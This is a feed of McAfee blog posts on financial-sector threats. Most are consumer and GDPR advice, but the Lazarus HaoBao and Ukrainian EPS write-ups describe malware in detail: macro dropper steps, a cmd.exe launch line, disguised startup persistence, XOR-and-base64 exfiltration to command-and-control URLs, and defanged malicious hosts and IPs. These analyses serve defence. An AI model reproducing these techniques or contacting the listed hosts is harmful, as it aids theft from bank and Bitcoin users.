financial services – McAfee Blogs https://securingtomorrow.mcafee.com Securing Tomorrow. Today. Thu, 10 Jan 2019 21:23:40 +0000 en-US hourly 1 https://securingtomorrow.mcafee.com/wp-content/uploads/2018/11/cropped-favicon-32x32.png financial services – McAfee Blogs https://securingtomorrow.mcafee.com 32 32 The Dangers of Linking Your Apple ID to Financial Accounts https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/the-dangers-of-linking-your-apple-id-to-financial-accounts/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/the-dangers-of-linking-your-apple-id-to-financial-accounts/#respond Fri, 12 Oct 2018 21:40:07 +0000 https://securingtomorrow.mcafee.com/?p=92037

The digital wallets of Chinese citizens are under attack thanks to a few bad apples. A recent string of cyberattacks in China utilized stolen Apple IDs to break into customers’ accounts and steal an undisclosed amount of money, according to a Bloomberg report. Almost immediately, Chinese e-transaction giants Tencent Holdings and Alipay warned their customers […]

The post The Dangers of Linking Your Apple ID to Financial Accounts appeared first on McAfee Blogs.

]]>

The digital wallets of Chinese citizens are under attack thanks to a few bad apples. A recent string of cyberattacks in China utilized stolen Apple IDs to break into customers’ accounts and steal an undisclosed amount of money, according to a Bloomberg report. Almost immediately, Chinese e-transaction giants Tencent Holdings and Alipay warned their customers to monitor their accounts carefully, especially those who have linked their Apple IDs to Alipay accounts, WeChat Pay or their digital wallets and credit cards.

While Alipay works with Apple to figure out how this rare security breach happened and how hackers were able to hijack Apple IDs, they’re urging customers to lower their transaction limits to prevent any further losses while this investigation remains ongoing. Because Apple has yet to resolve this issue, any users who have linked their Apple IDs to payment methods including WeChat Pay — the popular digital wallet of WeChat which boasts over a billion users worldwide and can be used to pay for almost anything in China — remain vulnerable to theft. Apple also advises users to change their passwords immediately.

This security breach represents a large-scale example of a trend that continues to rise: the targeting of digital payment services by cybercriminals, who are capitalizing on the growing popularity of these services. Apple IDs represent an easy entry point of attack considering they connect Apple users to all the information, devices and products they care about. That interconnectivity of personal data is a veritable goldmine for cybercriminals if they get their hands on something like an Apple ID. With so much at stake for something as seemingly small as an Apple ID, it’s important for consumers to know how to safeguard their digital identifiers against potential financial theft. Here are some ways they can go about doing so:

  • Make a strong password. Your password is your first line of defense against attack, so you should make it as hard as possible for any potential cybercriminals to penetrate it. Including a combination of uppercase and lowercase letters, numbers, and symbols will help you craft a stronger, more complex password that’s difficult for cybercriminals to crack. Avoid easy to guess passwords like “1234” or “password” at all costs.
  • Change login information for different accounts. An easy trap is using the same email and password across a wide variety of accounts, including Apple IDs. To better protect your Apple ID, especially if it’s linked to your financial accounts, it’s best to create a wholly original and complex password for it.
  • Enable two-factor authentication. While Apple works on identifying how these hackers hijacked Apple IDs, do yourself a favor and add an extra layer of security to your account by enabling two-factor authentication. By having to provide two or more pieces of information to verify your identity before you can log into your account, you place yourself in a better position to avoid attacks.
  • Monitor your financial accounts. When linking credentials like Apple IDs to your financial accounts, it’s important to regularly check your online bank statements and credit card accounts for any suspicious activity or transactions. Most banks and credit cards offer free credit monitoring as well. You could also invest in an identity protection service, which will reimburse you in the case of identity fraud or financial theft.

Stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

The post The Dangers of Linking Your Apple ID to Financial Accounts appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/the-dangers-of-linking-your-apple-id-to-financial-accounts/feed/ 0
Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection https://securingtomorrow.mcafee.com/business/financial-services-gdpr-200-professionals-told-us-data-protection/ https://securingtomorrow.mcafee.com/business/financial-services-gdpr-200-professionals-told-us-data-protection/#respond Thu, 12 Apr 2018 15:00:14 +0000 https://securingtomorrow.mcafee.com/?p=88293

When the European Union’s (EU) General Data Protection Regulation (DPR) comes into full force May 25, European citizens will receive greater privacy protection and regulators will have a strengthened authority to take action against businesses that breach the new laws. Fines of up to 4% of annual global revenue or €20 million, whichever is greater, […]

The post Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection appeared first on McAfee Blogs.

]]>

When the European Union’s (EU) General Data Protection Regulation (DPR) comes into full force May 25, European citizens will receive greater privacy protection and regulators will have a strengthened authority to take action against businesses that breach the new laws. Fines of up to 4% of annual global revenue or €20 million, whichever is greater, can be levied against any organization that processes personal data of EU residents, regardless of where they are based. Stories with doomsday predictions and generous helpings of fear can be found in many publications.

McAfee recently published an executive summary of our report, Beyond GDPR: Data Residency Insights from Around the World, that focuses on responses from the 200 professionals surveyed in the financial services sector. While there remains work to be done, it’s not all doom and gloom for the financial services industry. More than one quarter (27%) of financial services firms surveyed are already set up to comply with the GDPR requirement for controllers to report a breach to the appropriate authorities within 72 hours of becoming aware of a breach, when compared to just 20 percent of other industries. This is most likely the result of greater preparation, as the financial sector has a higher proportion of firms (28%) that have been working on compliance for three to four years, compared to the global average of just two years.

We believe that the looming threat of GDPR fines is an opportunity to communicate the seriousness of these regulations to your board and executives, and to position the firm as one that cares about personal privacy. And that could help boost the bottom line according to survey respondents – some 80% of financial services respondents believe that organizations that properly apply data protection laws will attract new customers.

Knowing what data is stored where is one of the most important steps of this data protection activity, but here are a few more that we recommend.

Step 1. Know Your Data.

Not only where it is, but what it is, why you are collecting it, and what levels of security and encryption are used to protect it. If you are collecting personal data that is not essential to your service offering, you may want to reconsider what you collect to better manage your risk of exposure, and comply with data-minimization principles.

Step 2. Enforce Encryption.

Effective encryption protects data by making it useless to hackers in the event of a data breach. Use proven encryption technologies, such as Triple Data Encryption Standard (DES), RSA, or Advanced Encryption Standards (AES) to ensure the safe storage of both your employees’ data and customers’ data.

Step 3. Pseudonymize personally identifiable information (PII).

Modifying data prior to processing so that it cannot be tracked back to a specific individual provides another layer of data protection. Pseudonymizing your data allows you to take advantage of Big Data and do larger scale data analysis, and is viewed as an appropriate technical and organizational measure under article 32 of the GDPR.

Step 4. Get Executive Management Involved.

The necessary changes to your data storage, monitoring, management, and security systems can require more human and financial resources than are currently budgeted. The potential of significant fines is an excellent opportunity to get the required support from the highest levels of your organization.

Step 5. Appoint a Project Owner.

Staying compliant with various data protection laws is not something that can be done by an IT staffer in their spare time. Consider appointing a data protection officer or equivalent, to take ownership of both implementation and ongoing management of this project. A data protection officer may be required in any event, depending on the nature of the processing carried out.

Step 6. Review Data Security with Cloud Vendors.

With cloud computing and storage touching most business processes in some fashion, consider conducting an audit of all your vendors’ systems, procedures, and contracts, and the data that they are handling and storing on your behalf. After all, each organization will be held responsible for meeting the GDPR requirements.

Step 7. Foster a Security-Aware Culture.

Human errors are often responsible for data and security breaches. It doesn’t matter that your business follows the strictest security protocol —one error made by one uninformed person could lead to irreparable damages. Consider making sure that all your employees and contractors receive proper and regular training on data security and the handling of customer information.

Step 8. Have a Response Plan.

No system is 100% bulletproof. You need an incident response plan in place to make sure that you can recover as quickly as possible in the event of a data breach. Under GDPR law, you are required as a controller to alert the appropriate authorities within 72 hours of becoming aware of a data breach, and you also need to notify any individuals whose personal data has been compromised.

Step 9.  Go with a Privacy by Design Approach.

The GDPR places a requirement on organizations to take into account data privacy during design stages of all projects.  Companies will want to consider data-protection technologies such as data loss prevention (DLP) and cloud data protection (CASB) from the very beginning of the development. Implement data-protection policies that would help prevent both accidental and malicious data theft by insiders and cybercriminals – doesn’t matter where it resides.

While no one can guarantee that you will not suffer a data loss, following these steps will help you understand where you stand, identify any gaps, and improve your organization’s responsiveness. Loss of customer confidence was the most common concern of financial services organisations (64%), and rapid containment and response is one of the best ways to protect your firm’s valuable reputation. So keep calm, and prepare for GDPR.

Read the full report, Beyond GDPR: Data Residency Insights from Around the World, and learn more about the top data-protection concerns and strategies of more than 800 senior business professionals from eight countries and a range of industries.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/financial-services-gdpr-200-professionals-told-us-data-protection/feed/ 0
To See Mugshots of Today’s Bank Robbers, Look at a World Map https://securingtomorrow.mcafee.com/business/see-mugshots-todays-bank-robbers-look-world-map/ https://securingtomorrow.mcafee.com/business/see-mugshots-todays-bank-robbers-look-world-map/#respond Wed, 21 Feb 2018 14:18:59 +0000 https://securingtomorrow.mcafee.com/?p=84590

In Depression-era America, bank robbers John Dillinger, Baby Face Nelson, and Pretty Boy Floyd were household names. Newspapers detailed their heists, radios narrated their getaways, wanted posters plastered their mug-shot scowls from coast-to-coast. Every detail of their bank robberies and personal lives was seized upon, scrutinized, circulated, and discussed. Eight decades later, bank robbery is […]

The post To See Mugshots of Today’s Bank Robbers, Look at a World Map appeared first on McAfee Blogs.

]]>

In Depression-era America, bank robbers John Dillinger, Baby Face Nelson, and Pretty Boy Floyd were household names. Newspapers detailed their heists, radios narrated their getaways, wanted posters plastered their mug-shot scowls from coast-to-coast. Every detail of their bank robberies and personal lives was seized upon, scrutinized, circulated, and discussed.

Eight decades later, bank robbery is a digital, systematic crime practiced – with methods constantly improved – by organized syndicates. The stubbled faces of Dillinger, Nelson, and Floyd have been replaced by shapes on the world map tracing the borders of Russia, North Korea, and Iran. A former NSA Deputy Director said publicly in March that “nation states are robbing banks.”

A 2015-16 campaign stole hundreds of millions of dollars from banks in the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. SWIFT network banks in. That campaign, which targeted developing countries, was linked to the North Korean Reconnaissance General Bureau (RGB), security analysts believe. In 2017 North Korean hackers targeted at least three South Korean cryptocurrency exchanges, capitalizing on Bitcoin’s anonymity to circumvent international sanctions. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and blockchain.

The best cybercriminals in the world live in Russia, where they are largely immune from prosecution. For instance, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts, used the stolen data for spam and credit card fraud for personal benefit. Iran’s DDOS attack on leading U.S. banks exemplify its coercive strategy to exert influence through disruption and destruction.

Hackers in these countries, whether affiliated with the state or not, account for much of the cost of global cybercrime. The latest strategy of their sophisticated operations is to target the “seams” between well-defended networks, exploiting weak points in the global financial network to pull off massive heists and in some cases further their national rhetoric.

To combat these operations, major international financial institutions are investing in defense, better fraud prevention, and transaction authentication. One report says that banks spend three times as much on cybersecurity as non-financial institutions to fight what has become a systematic risk to financial stability.

In the 1920s and ‘30s, the world sat back and watched John Dillinger, Baby Face Nelson, and Pretty Boy Floyd do their dirty work as the FBI slowly closed in. We can’t do that today. Governments, financial institutions, companies with banking records, and anyone with an ATM card should be invested in stopping financial cybercrime.

Banks have banded together to share information in near real time in order to protect the stability of the broader electronic financial system on which the world economy to heavily depends. Ultimately, they have determined that no one organization can go it alone with faced with such organized and well-funded adversaries. With the stability of the global financial system in play, unprecedented collaboration has become the new norm, we at McAfee embrace the same spirit by building all of our technology to facilitate the sharing of critical data across hundreds of technology partners. It appears sharing and collaboration will be the only way to counter this new breed of adversary and no one can go it alone anymore. The banks are leading  the way in this new reality of Together is Power.

For more information, follow us on @McAfee.

The post To See Mugshots of Today’s Bank Robbers, Look at a World Map appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/see-mugshots-todays-bank-robbers-look-world-map/feed/ 0
Lazarus Resurfaces, Targets Global Banks and Bitcoin Users https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#respond Mon, 12 Feb 2018 15:30:32 +0000 https://securingtomorrow.mcafee.com/?p=84373 McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

]]>
This blog was written with support and contributions provided by Asheer Maholtra, Jessica Saavedra Morales, and Thomas Roccia.

McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

This new campaign, dubbed HaoBao, resumes Lazarus’ previous phishing emails, posed as employee recruitment, but now targets Bitcoin users and global financial organizations. When victims open malicious documents attached to the emails, the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering.

HaoBao targets and never-before-seen implants signal to McAfee ATR an ambitious campaign by Lazarus to establish cryptocurrency cybercrime at a sophisticated level.

Background

Beginning in 2017, the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents. The campaign lasted from April to October and used job descriptions relevant to target organizations, in both English and Korean language. The objective was to gain access to the target’s environment and obtain key military program insight or steal money. The 2017 campaign targets ranged from defense contractors to financial institutions, including crypto currency exchanges, however; much of this fake job recruitment activity ceased months later, with the last activity observed October 22, 2017.

Analysis

On January 15th , McAfee ATR discovered a malicious document masquerading as a job recruitment for a Business Development Executive located in Hong Kong for a large multi-national bank. The document was distributed via a Dropbox account at the following URL:

hxxps://www.dropbox.com/s/qje0yrz03au66d0/JobDescription.doc?dl=1

This is the mark of a new campaign, though it utilizes techniques, tactics and procedures observed in 2017. This document had the last author ‘Windows User’ and was created January 16, 2018 with Korean language resources. Several additional malicious documents with the same author appeared between January 16 though January 24, 2018.

Document summary from Virus Total

 

Malicious job recruitment documents


Victims are persuaded to enable content through a notification claiming the document was created in an earlier version of Microsoft Word. The malicious documents then launch an implant on the victim’s system via a Visual Basic macro.

Malicious Microsoft Word document

 

Implants dropped in campaign

The document (7e70793c1ca82006775a0cac2bd75cc9ada37d7c) created January 24, 2018 drops and executes an implant compiled January 22, 2018 with the name lsm.exe (535f212b320df049ae8b8ebe0a4f93e3bd25ed79). The implant lsm.exe contacted 210.122.7.129 which also resolves to worker.co.kr.Implants dropped in campaign

The other malicious document ( a79488b114f57bd3d8a7fa29e7647e2281ce21f6) created January 19, 2018 drops the implant (afb2595ce1ecf0fdb9631752e32f0e32be3d51bb); which is 99% similar-to the lsm.exe implant.

This document was distributed from the following Dropbox URLs:

  • hxxps://dl.dropboxusercontent.com/content_link/AKqqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1
HTTP response for job description document

This implant (csrss.exe) compiled January 15, 2018 contacts an IP address 70.42.52.80 which resolves to deltaemis.com. We identified that this domain was used to host a malicious document from a previous 2017 campaign targeting the Sikorsky program.

  • hxxp://deltaemis.com/CRCForm/3E_Company/Sikorsky/E4174/JobDescription.doc

A third malicious document (dc06b737ce6ada23b4d179d81dc7d910a7dbfdde) created January 19, 2018 drops e8faa68daf62fbe2e10b3bac775cce5a3bb2999e which is compiled January 15, 2018. This implant communicates to a South Korean IP address 221.164.168.185 which resolves to palgong-cc.co.kr.

McAfee ATR analysis finds the dropped implants have never been seen before in the wild and have not been used in previous Lazarus campaigns from 2017. Furthermore, this campaign deploys a one-time data gathering implant that relies upon downloading a second stage to gain persistence. The implants contain a hardcoded word “haobao” that is used as a switch when executing from the Visual Basic macro.

Malicious Document Analysis

The malicious document contains two payloads as encrypted string arrays embedded in Visual Basic macro code. The payloads are present as encrypted string arrays that are decrypted in memory, written to disk and launched in sequence (second stage malicious binary launched first and then the decoy document).

The VBA Macro code is self-executing and configured to execute when the OLE document (MS Word doc) is opened (via “Sub AutoOpen()”). The AutoOpen() function in the VBA Macro performs the following tasks in the sequence listed:

  • Decodes the target file path of the second stage binary payload. This file path is calculated based on the current user’s Temp folder location:

<temp_dir_path>\.\lsm.exe

VB code to decrypt second stage filepath
  • Decodes the second stage binary in memory and writes it to the %temp%\.\lsm.exe file location
second stage binary (MZ) as an encrypted String Array in the VBA Macro
second stage binary (MZ) decoded in memory by the VBA Macro
  • After writing the second stage payload to disk the VBA code performs two important actions.
    • Runs the second stage payload using cmd.exe. This is done so that the cmd.exe process exists as soon as the payload is launched. This way a process enumeration tool cannot find the parent process => Smaller footprint.

cmdline for executing the second stage binary:

cmd.exe /c start /b <temp_dir_path>\.\lsm.exe /haobao

  • Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments:

Link file command line: <temp_dir_path>\.\lsm.exe /haobao

Link File Name: GoogleUpdate.lnk

Trigger code for executing the second stage binary and establishing persistence

 

LNK file configuration for establishing persistence
  • Once the second stage payload has been launched, the VBA Macro proceeds to display a decoy document to the end user. This decoy document is also stored in the VBA Macro as an encrypted string array (similar to the second stage payload). The decoy document is again written to the user’s temp directory to the following filename/path:

<temp_dir_path>\.\Job Description.doc

Decoy Document decoded in memory by the VBA Macro
  • Once the decoy document has been written to disk, the VBA Macro sets its file attributes to System + Hidden
  • The decoy document is then opened by the malicious VBA Macro and the original malicious document’s caption is copied over to the decoy document to trick the end user into mistaking the decoy document for the original (malicious) document.
  • This activity, combined with the fact that the VBA Macro then closes the current (malicious) document, indicates that the VBA Macro aims to trick an unsuspecting user into thinking that the decoy document currently open is the original (malicious) document opened by the user.
  • Since the decoy document is a benign file and does not contain any macros the victim does not suspect any malicious behavior.

Implant Analysis

As part of the implant initialization activities the implant does the following;

  • Checks the string passed to it through command line
    • “/haobao” in case of 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
    • “/pumpingcore” in case of e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

If the malware does not find this string in its cmdline arguments, it simply quits without going any further.

  • Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information.

During our research, we discovered additional variants of the DLL file.


DLL information

 

  • As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory:
    • Copy the unwrapped DLL into new locations in its own memory space.
    • Build imports required by the DLL (based on the IAT of the DLL)
Imports builder code in malware for the DLL imports
  • Call the newly loaded DLL image’s Entry Point (DllMain) with DLL_PROCESS_ATTACH to complete successful loading of the DLL in the malware process.
DLL Entry Point Call from malware to finish loading of the DLL in memory
  • Call the actual malicious export in the DLL named “CoreDn”
Hardcoded DLL export name “CoreDn” in malware

All the malicious activities described below are performed by the DLL unless specified otherwise.

Data Reconnaissance

The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server.

  • Computer name and currently logged on user’s name, stored in the format

<ComputerName> \ <Username>

Malware obtaining the computer name and user name
  • List of all processes currently running on the system arranged in format

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

Malware collecting process information from endpoint
  • The presence of a specific registry key on the system

HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

  • The malware appends an indicator (flag) specifying whether the above registry key was found in the user’s registry:

This key is checked again as part of the command and control communication and is sent as a duplicate value to the command and control in the HTTP POST request as well (explained in the below).

Malware checking for the presence of the registry key

Exfiltration

Preparation

In preparation of the exfiltration of information collected from the endpoint, the malware performs the following activities:

  • Encode the collected information using a simple byte based XOR operation using the byte key: 0x34.
  • Base64 encode (standard) the XORed data.
  • Again, check for the presence of the Registry Key: HKCU\Software\Bitcoin\Bitcoin-Qt

 

Command and Control Server Communication

Once the malware has performed all these activities it sends an HTTP POST request to the CnC server:

  • www[dot]worker.co.kr for md5 BDAEDB14723C6C8A4688CC8FC1CFE668
  • www[dot]palgong-cc.co.kr for md5 D4C93B85FFE88DDD552860B148831026

 

In the format:

HTTP POST to www[dot]worker.co.kr

/board2004/Upload/files/main.asp?idx=%d&no=%s&mode=%s

OR

 

HTTP POST to www[dot]palgong-cc.co.kr

/html/course/course05.asp?idx=%d&no=%s&mode=%s

where

idx= 20 (14h) if the Registry key does not exist; 24 (18h) if the key exists.

no= XORed + base64 encoded “<Computername> \ <username>”

mode= XORed + base64 encoded Process listing + Registry key flag

Command and control server domain

Persistence

The persistence mechanism of the malware is performed only for the downloaded implant. Persistence is established for the implant via the visual basic macro code initially executed upon document loading by the victim. This persistence is also performed ONLY if the malware successfully executes the downloaded implant. The malware first tries to update the HKEY_LOCAL_MACHINE registry key.

If the update is unsuccessful then it also tries to update the HKEY_CURRENT_USER registry key. Value written to registry to achieve persistence on the endpoint:

Registry Subkey = Software\Microsoft\Windows\CurrentVersion\Run

Value Name = AdobeFlash

Value Content = “C:\DOCUME~1\<username>\LOCALS~1\Temp\OneDrive.exe” kLZXlyJelgqUpKzP

Registry based persistence of the second stage payload

Connections to 2017 campaigns

The techniques, tactics and procedures are very similar to the campaigns that targeted US Defense contractors, US Energy sector, financial organizations and crypto currency exchanges in 2017.

The same Windows User author appeared back in 2017 in two malicious documents 비트코인_지갑주소_및_거래번호.doc and 비트코인 거래내역.xls which were involved in crypto currency targeting. Furthermore, one of the implants communicates to an IP address that was involved in hosting malicious job description documents in 2017 involving the Sikorsky military program.

McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:

  • Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017
  • Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns
  • Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns
  • The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft

Conclusion

In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans.

 

 Indicators of Compromise

MITRE ATT&CK techniques

  • Data encoding
  • Data encrypted
  • Command-Line Interface
  • Account discovery
  • Process Discovery
  • Query registry
  • Hidden files and directories
  • Custom cryptographic protocol
  • Registry Run Keys / Start Folder
  • Startup Items
  • Commonly used port
  • Exfiltration Over Command and Control Channel

IPs

  • 210.122.7.129
  • 70.42.52.80
  • 221.164.168.185

URLs

  • hxxps://dl.dropboxusercontent.com/content_link/AKqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

Hashes

  • dc06b737ce6ada23b4d179d81dc7d910a7dbfdde
  • a79488b114f57bd3d8a7fa29e7647e2281ce21f6
  • 7e70793c1ca82006775a0cac2bd75cc9ada37d7c
  • 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
  • 1dd8eba55b16b90f7e8055edca6f4957efb3e1cd
  • afb2595ce1ecf0fdb9631752e32f0e32be3d51bb
  • e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

McAfee Detection

  • BackDoor-FDRO!
  • Trojan-FPCQ!
  • RDN/Generic Downloader.x
  • RDN/Generic Dropper
  • RDN/Generic.dx

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/feed/ 0
Ukrainian Financial Institutions Targeted by Wave of Malicious EPS File Attacks https://securingtomorrow.mcafee.com/business/ukrainian-financial-institutions-targeted-wave-malicious-eps-file-attacks/ https://securingtomorrow.mcafee.com/business/ukrainian-financial-institutions-targeted-wave-malicious-eps-file-attacks/#respond Thu, 24 Aug 2017 23:05:00 +0000 https://securingtomorrow.mcafee.com/?p=77213 Last week, the Ukrainian Central Bank issued a warning around an attack being launched against Ukrainian banks. Thanks to one of our contacts in the region, we received the malware at an early stage and were able to provide coverage for our customers—always our first priority. Now that local authorities have publicly disclosed the matter, […]

The post Ukrainian Financial Institutions Targeted by Wave of Malicious EPS File Attacks appeared first on McAfee Blogs.

]]>
Last week, the Ukrainian Central Bank issued a warning around an attack being launched against Ukrainian banks. Thanks to one of our contacts in the region, we received the malware at an early stage and were able to provide coverage for our customers—always our first priority. Now that local authorities have publicly disclosed the matter, we would like to share some insights into the campaign.

The attacks appear to have targeted banks in Russia as well as Ukraine, and we are aware of reports of similar attack vectors and payloads in other countries.

The initial threat started with emails sent to the banks around August 10, 2017, and a second wave on August 18 that carried attachments containing a payload. The subject of the emails were triggered to get the attention of the users and lure them into opening the attachments.

Who wouldn’t open an email with the subject “Unauthorized Money Withdrawal” from a non-banking related email-address? We noticed the following attachment names for the document files:

  • Выписка.docx
  • Выписка по счету.docx
  • Выписка по карте.docx
  • Выписка по карте клиента.docx
  • 12.docx

The above can be translated as “Account Statement” or ”Card statement/Customer Card Statement”.

The document is weaponized with a payload hidden in an embedded Encapsulated Postscript (EPS) file. EPS files are mostly used to display print previews or contain other functions related to printing.

When opening the .docx file, the following is shown:

In this case, again the name of the document is shown in Microsoft Word, ‘Customer Card Statement’.

When Word is opened, the payload in the .eps file starts to hook and inject itself, and creates the process “FLTLDR.exe”, which runs from the path: \PROGRAMFILES%\Microsoft Shared\GRPHFLT\EPSIMP32.FLT

Since docx files are zip-files, we unzipped the attachment and investigated the unzipped files for interesting artifacts and compared them against our internal threats database. For example, we discovered a URL in the App.xml file:

When investigating that URL through our resources, we discovered that that same URL was used in a targeted campaign described by our industry peers from ESET.

Actually, the targeted attack described by ESET has a lot more in common with our current banking campaign. Could our attackers have borrowed the code and altered it to their needs?

When we dug deeper into the details of the ‘image1.eps’ file, we noticed two awkward strings that you normally wouldn’t see in malware:

  • %%Icantdestroywhatisntthere
  • %%Myheartisjusttoodarktocare

After searching for these strings, they seem to belong to a song called ‘Snuff’ by Slipknot.

Ha, maybe our actors are metalheads or simply using it as a distraction.

When we ran the EPS file through our tools, it was flagged as CVE 2015-2545 and CVE 2017-0262, both constructs of malicious EPS files that could exploit the system opening this crafted file.

Once the malware has managed to infect a system, it tries to connect to a server based in France over TCP port 80:

hxxp://137.74.224.142/z/get.php?name=3c6*****

This IP-address seems to have a reputation for ‘badness’ in multiple campaigns, including those used for spam-distribution.

To prevent this attack from being successful, we recommend that Microsoft’s security patches be immediately installed on endpoints. These patches will address the following CVE-numbers:

  • CVE 2015-2545
  • CVE 2017-0261
  • CVE 2017-0262

McAfee customers using our endpoint solutions are protected from this threat by a signature called “Exploit-CVE2015-2545.l”

Hashes of files we received:

  • ecc055974d7d190871dc4eb1bf1f8b998d6e8abf04dba2ff560ae395aeec4d5d
  • 430c1bfa22e0f7b0e8742c0d70b8911089ba58645818e4281d7066d1324a3952
  • 1892154cc47e8a1bc81186d131e001a22e4edbc4fd88688eb1782b934e1941b6
  • e9d843761df7f6ef193d9f8e88d93a90816f2067fdd51a1c0765dfbfd4cb398f
  • 647572d133677882f52843f799375ac77178616bcd3d9ed13b95d49eecfd0a51

The post Ukrainian Financial Institutions Targeted by Wave of Malicious EPS File Attacks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/ukrainian-financial-institutions-targeted-wave-malicious-eps-file-attacks/feed/ 0
POS Malware Steals Payment Card and Personal Info from Food Kiosks https://securingtomorrow.mcafee.com/business/pos-malware-steals-payment-card-personal-info-food-kiosks/ https://securingtomorrow.mcafee.com/business/pos-malware-steals-payment-card-personal-info-food-kiosks/#respond Tue, 18 Jul 2017 19:00:57 +0000 https://securingtomorrow.mcafee.com/?p=76112 Point-of-sale malware can make its way into almost anything these days, from massive corporate systems to individual devices. The latest victim is Avanti Markets, a leading “micro market” vending company hit with malware that has stolen payment and possibly fingerprint data from self-service payment kiosks in various locations. The cybercriminals likely breached the kiosk provider’s […]

The post POS Malware Steals Payment Card and Personal Info from Food Kiosks appeared first on McAfee Blogs.

]]>
Point-of-sale malware can make its way into almost anything these days, from massive corporate systems to individual devices. The latest victim is Avanti Markets, a leading “micro market” vending company hit with malware that has stolen payment and possibly fingerprint data from self-service payment kiosks in various locations.

The cybercriminals likely breached the kiosk provider’s network and used infected Windows computers as a beachhead in the attack. From there, POS malware can bypass some encryption technology and grab unprotected card data out of the volatile memory of a POS device. Regardless, it appears Avanti had not rolled out encryption on all their devices prior to the attack

POS malware is also typically written to attack unique and widely used POS systems, and versions have been found that attack specific restaurant and gas station software kits. The attackers in this case used a Poseidon toolkit developed in 2015.

After investigating the attack, officials said it appears the malware gathered cardholders’ first and last names, credit/debit card numbers, and expiration dates. In addition, users of the Market Card option may have had their names and email addresses compromised. And although biometric information was at risk in this attack, it seems stored fingerprint data has not been compromised.

Avanti states that 1,900 devices were affected, but the true extent of the breach is still unknown. Imitation attacks may soon follow, and the publicity gained by the Avanti attack may be used by attackers in phishing scams to lure Avanti users into further revealing their credit card data.

The good news is Avanti has offered credit monitoring to impacted customers. However, to ensure their financial data is secure, customers should also keep a close eye on their bank accounts to look for any fraudulent activity.

To learn more about this POS malware attack and others like it, follow us at @McAfee and @McAfee_Business.

The post POS Malware Steals Payment Card and Personal Info from Food Kiosks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/pos-malware-steals-payment-card-personal-info-food-kiosks/feed/ 0
